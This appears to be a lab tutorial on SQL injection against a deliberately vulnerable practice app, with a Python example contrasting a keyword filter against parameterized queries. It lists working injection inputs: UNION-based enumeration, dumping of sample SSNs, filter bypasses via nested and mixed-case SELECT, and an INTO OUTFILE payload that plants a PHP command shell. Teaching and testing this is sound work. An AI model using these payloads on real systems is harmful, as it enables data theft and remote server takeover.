Hands-On SQL Injection Tutorial #2

1. Reset the Database Before Using It

2. SQL Database Structure

The database named sqlol contains the two tables shown below.

Table: users

  username               isadmin
  ---------------------  -------
  Herp Derper            1
  SlapdeBack LovedeFace  1
  Wengdack Slobdegoob    0
  Chunk MacRunfast       0
  Peter Weiner           0

Table: ssn

  name                   ssn
  ---------------------  -----------
  Herp Derper            111-11-1111
  SlapdeBack LovedeFace  222-22-2222
  Wengdack Slobdegoob    333-33-3333
  Chunk MacRunfast       444-44-4444
  Peter Weiner           555-55-5555

Important Terms

Database -- an object that contains Tables
Table -- an object that contains Fields
Field -- an item of data, such as a name or ssn

3. Blocking Apostrophe

This form deletes apostrophes from the name before using it in a SQL query. However, the numerical field (IsAdmin) is placed in the query without quotes, so no apostrophe is needed to inject into it and it remains exploitable.

Try the inputs below in this form to see how it works.

The form has two fields: Name and IsAdmin (0 or 1).

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name' AND isadmin = IsAdmin

(name and IsAdmin are replaced by the two form values; note that the IsAdmin value is not enclosed in quotes.)

Values to Try

Find User

Name:    Herp Derper
IsAdmin: 1

Detect Filtering

Name:    Herp 'Derper
IsAdmin: 1

Detect Vulnerability

Name:    Herp Derper
IsAdmin: 2-1

Test for 1 Column Returned

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null #

Test for 2 Columns Returned

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, Null #

Find Database Names

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, table_schema FROM information_schema.tables #

Find Tables in sqlol Database

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' #

Find Columns within ssn Table

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' #

Dump Names and SSNs

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn #

Upload a PHP Shell

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #

4. Blocking SELECT

This form uses this PHP code to remove SELECT from both inputs before building the query:

    $qname = str_replace("SELECT", "", $qname);
    $qisadmin = str_replace("SELECT", "", $qisadmin);

Note that str_replace is case-sensitive and makes a single, non-recursive pass over the string; both properties matter for the inputs below.

Try the inputs below in this form to see how it works.

The form has two fields: Name and IsAdmin (0 or 1).

Performs This Query:

SELECT username FROM users WHERE username LIKE 'name' AND isadmin = IsAdmin

(name and IsAdmin are replaced by the two form values after the SELECT filter has run; the IsAdmin value is again not enclosed in quotes.)

Values to Try

Find User

Name:    Herp Derper
IsAdmin: 1

Detect Filtering

Name:    HerpSELECT Derper"
IsAdmin: 1SELECT

Detect Vulnerability

Name:    Herp Derper
IsAdmin: 2-1

Test for 2 Columns Returned: FAILS

Name:    Herp Derper
IsAdmin: 1 UNION SELECT Null, Null #

Test for 2 Columns Returned: SUCCEEDS

Name:    Herp Derper
IsAdmin: 1 UNION SELSELECTECT Null, Null #

Test for 2 Columns Returned: SUCCEEDS

Name:    Herp Derper
IsAdmin: 1 UNION sElEcT Null, Null #
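As an added example (not part of the original tutorial or the sqlol application), the Python below emulates the str_replace filter from section 4, checks which of the three "Test for 2 Columns" inputs above still reach the SQL parser with a SELECT intact, and contrasts the concatenated query with a parameterized one that validates IsAdmin as an integer. The in-memory sqlite3 tables are a constructed stand-in built from the page's sample rows.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the tutorial's sqlol database (rows from the page).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, isadmin INTEGER);
        INSERT INTO users VALUES ('Herp Derper', 1), ('Peter Weiner', 0);
        CREATE TABLE ssn (name TEXT, ssn TEXT);
        INSERT INTO ssn VALUES ('Herp Derper', '111-11-1111'), ('Peter Weiner', '555-55-5555');
    """)
    return conn

def strip_select(value):
    # The section 4 filter: one case-sensitive, non-recursive removal of the literal SELECT.
    return value.replace("SELECT", "")

def build_query_like_tutorial(name, isadmin):
    # Vulnerable form: apostrophes dropped from name, SELECT stripped from both fields,
    # then both values concatenated straight into the SQL text. IsAdmin is unquoted,
    # so whatever survives the filter is parsed as SQL, not as a value.
    name = strip_select(name.replace("'", ""))
    isadmin = strip_select(isadmin)
    return (f"SELECT username FROM users WHERE username LIKE '{name}' "
            f"AND isadmin = {isadmin}")

def select_survives(value):
    # Defender's check: does a SELECT keyword still reach the SQL parser after the
    # filter? The parser is case-insensitive, so this check must be too.
    return re.search(r"\bselect\b", strip_select(value), re.IGNORECASE) is not None

def query_safe(conn, name, isadmin):
    # Hardened form: IsAdmin is validated as the 0/1 integer the schema expects, and
    # both values are bound as parameters, so the database never parses them as SQL.
    if isadmin not in ("0", "1"):
        raise ValueError("isadmin must be 0 or 1")
    cur = conn.execute(
        "SELECT username FROM users WHERE username LIKE ? AND isadmin = ?",
        (name, int(isadmin)),
    )
    return [row[0] for row in cur.fetchall()]

if __name__ == "__main__":
    for payload in ("1 UNION SELECT Null, Null #",
                    "1 UNION SELSELECTECT Null, Null #",
                    "1 UNION sElEcT Null, Null #"):
        print(select_survives(payload), "|", build_query_like_tutorial("Herp Derper", payload))
    print(query_safe(build_db(), "Herp Derper", "1"))
```

Only the first payload is neutralized by the filter; the nested and mixed-case forms pass through unchanged in meaning, while query_safe rejects all three before any SQL is built.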


Posted 10-31-16 by Sam Bowne